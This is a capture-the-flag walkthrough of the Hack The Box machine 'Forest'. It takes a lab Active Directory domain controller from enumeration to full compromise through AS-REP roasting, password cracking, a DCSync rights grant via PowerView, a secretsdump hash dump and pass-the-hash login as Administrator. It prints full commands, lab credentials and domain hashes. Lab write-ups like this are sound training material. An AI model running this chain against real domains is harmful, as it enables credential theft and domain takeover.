skip to Main Content

HTB – Forest

#nmap -sVC 10.10.10.161  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 08:18 CEST  
Nmap scan report for 10.10.10.161  
Host is up (0.047s latency).  
Not shown: 991 closed ports  
PORT    STATE SERVICE      VERSION  
53/tcp  open  domain       Simple DNS Plus  
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-04-17 06:32:43Z)  
135/tcp open  msrpc        Microsoft Windows RPC  
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn  
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)  
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)  
464/tcp open  kpasswd5?  
593/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0  
636/tcp open  tcpwrapped  
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows  
 
Host script results:  
|_clock-skew: mean: 2h33m34s, deviation: 4h02m32s, median: 13m32s  
| smb-os-discovery:   
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)  
|   Computer name: FOREST  
|   NetBIOS computer name: FOREST\x00  
|   Domain name: htb.local  
|   Forest name: htb.local  
|   FQDN: FOREST.htb.local  
|_  System time: 2021-04-16T23:32:51-07:00  
| smb-security-mode:   
|   account_used: guest  
|   authentication_level: user  
|   challenge_response: supported  
|_  message_signing: required  
| smb2-security-mode:   
|   2.02:   
|_    Message signing enabled and required  
| smb2-time:   
|   date: 2021-04-17T06:32:50  
|_  start_date: 2021-04-17T06:32:02  
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 28.69 seconds

looks like a DC πŸ™‚ enumeration on DC are easy with ldapsearch or enum4linux. (Enum4linux is way easier) found an service account and a lot of users. the Service account is vulnerable to ASREPRoast attack. MORE HERE πŸ™‚

ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=htb,dc=local" > forest.txt

# svc-alfresco, Service Accounts, htb.local 
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local 
python GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass                                                                                                      
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation  
 
[*] Getting TGT for svc-alfresco  
$krb5asrep$23$svc-alfresco@HTB.LOCAL:42ac68df348f00d42fb9fe2985ef072b$0a12441c40b6d426281b39d1988ea2dc4f2eb147f666ce6973b325d9f45ad1631f4a558262a30a3dcfb4f5b7d76f434a49aa645aadac 
e6f2250e247295737fbf5444f32f199682d207c4da1524003627804caa33316bb55e0e93583e2a4eb160319459d34480afc2203ae43fb9691f09a70520396f0fbfbb84f4c101c76e4e7fc40c5bea3cfcd45f2ce58599dea925 
3fc592fcfe507975cb9b7bdb7b7e0384c99fea8ac1de1c62c1233db54fc89482b95cd1de3ea2f879c88c467279d2f9625ec0f3ecc09687212e280c2ffaec080612d5cd66ae178e0d3f111c774a13848e3f8021c6db431f

copy the hash to a file and start john to get the password

$john forest.txt --fork=4 -w=/home/chris/Downloads/rockyou.txt   
Using default input encoding: UTF-8  
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])  
Will run 3 OpenMP threads per process (12 total across 4 processes)  
Node numbers 1-4 of 4 (fork)  
Press 'q' or Ctrl-C to abort, almost any other key for status  
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)  
3 1g 0:00:00:02 DONE (2021-04-17 12:38) 0.3875g/s 395906p/s 395906c/s 395906C/s s64763658m..s3r10u55  
4 0g 0:00:00:06 DONE (2021-04-17 12:38) 0g/s 553386p/s 553386c/s 553386C/s !!22QQqqWW.ie168  
1 0g 0:00:00:06 DONE (2021-04-17 12:38) 0g/s 532828p/s 532828c/s 532828C/s !!11solid.abygurl69  
Waiting for 3 children to terminate  
2 0g 0:00:00:06 DONE (2021-04-17 12:38) 0g/s 525027p/s 525027c/s 525027C/s !!123!!rere.a6_123  
Session completed

until we now have the password for the service account we can run evil-winrm to connect and get the user flag.

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

login to the victim server and transfer the Sharphound.ps1 and execute it, download the ZIP and found a way with bloodhound.

therefore i create a new user and give him the „exchange windows permission“ group

*Evil-WinRM* PS C:\Users\svc-alfresco> net user chris password444 /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net group "Exchange Windows Permissions" chris /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> net localgroup "Remote Management Users" chris /add
The command completed successfully.

now its time to change the user // to get the Add-ObjectACL running you have to transfer powerview.ps1 before πŸ™‚ Powerview

*Evil-WinRM* PS C:\Users\chris> $passwort = convertto-securestring 'password444' -asplain -force
*Evil-WinRM* PS C:\Users\chris> $creds = new-object system.management.automation.pscredential('htb\chris' , $passwort)
*Evil-WinRM* PS C:\Users\chris> . ./Powerview.ps1
*Evil-WinRM* PS C:\Users\chris> Add-ObjectACL -PrincipalIdentity chris -Credential $cred -Rights DCSync

the new user had now the DCSync rights, now we can get a dump AD User hashes with secretsdump.py

β”Œβ”€[root@parrot]─[/home/chris/winprives/impacket/examples]  
└──╼ #secretsdump.py htb/chris@10.10.10.161                                                                                                                                         
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation  
 
Password:  
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied   
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)  
[*] Using the DRSUAPI method to get NTDS.DIT secrets  
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::  
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::  
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::  
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::  
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::  
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::  
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::  
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::  
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::  
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::  
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::  
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::  
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::  
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::  
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::  
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::  
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::  
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::  
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::  
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::  
chris:7601:aad3b435b51404eeaad3b435b51404ee:8690641174435a16f2c666911c227ad6:::  
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:7a2cd363358f73797e95baba42d12b56:::  
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::  
[*] Kerberos keys grabbed  
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b  
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58  
krbtgt:des-cbc-md5:9dd5647a31518ca8  
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4  
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e  
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e  
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf  
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd  
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e  
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e  
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed  
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983  
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91  
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f  
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a  
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c  
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8  
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d  
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81  
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6  
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5  
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a  
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2  
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29  
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7  
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538  
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702  
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352  
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d  
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701  
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd  
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36  
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb  
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c  
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3  
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054  
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161  
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a  
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58  
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5  
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad  
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce  
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32  
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea  
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a  
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f  
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6  
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da  
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6  
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81  
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9  
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427  
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25  
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd  
chris:aes256-cts-hmac-sha1-96:d0a4d2b67c5a250d28dfe4d81824b2ff1f9e89d014e9e6172c489e1427626a2f  
chris:aes128-cts-hmac-sha1-96:03be315870b3722fff7730241ea55813  
chris:des-cbc-md5:d39dd3dc51ab7668  
FOREST$:aes256-cts-hmac-sha1-96:19044b658fd2ef51cc6b838dad42860c29dab80d547cf4f5323924fb14e1f8ae  
FOREST$:aes128-cts-hmac-sha1-96:9fcbdc62e82a9f62d09e067974cf55f1  
FOREST$:des-cbc-md5:c8132fbf73c71fa8  
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6  
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e  
EXCH01$:des-cbc-md5:8c45f44c16975129  
[*] Cleaning up...  

now you only have to copy the NTLMN Hash and you can login with Pass-the-hash as administrator

evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Back To Top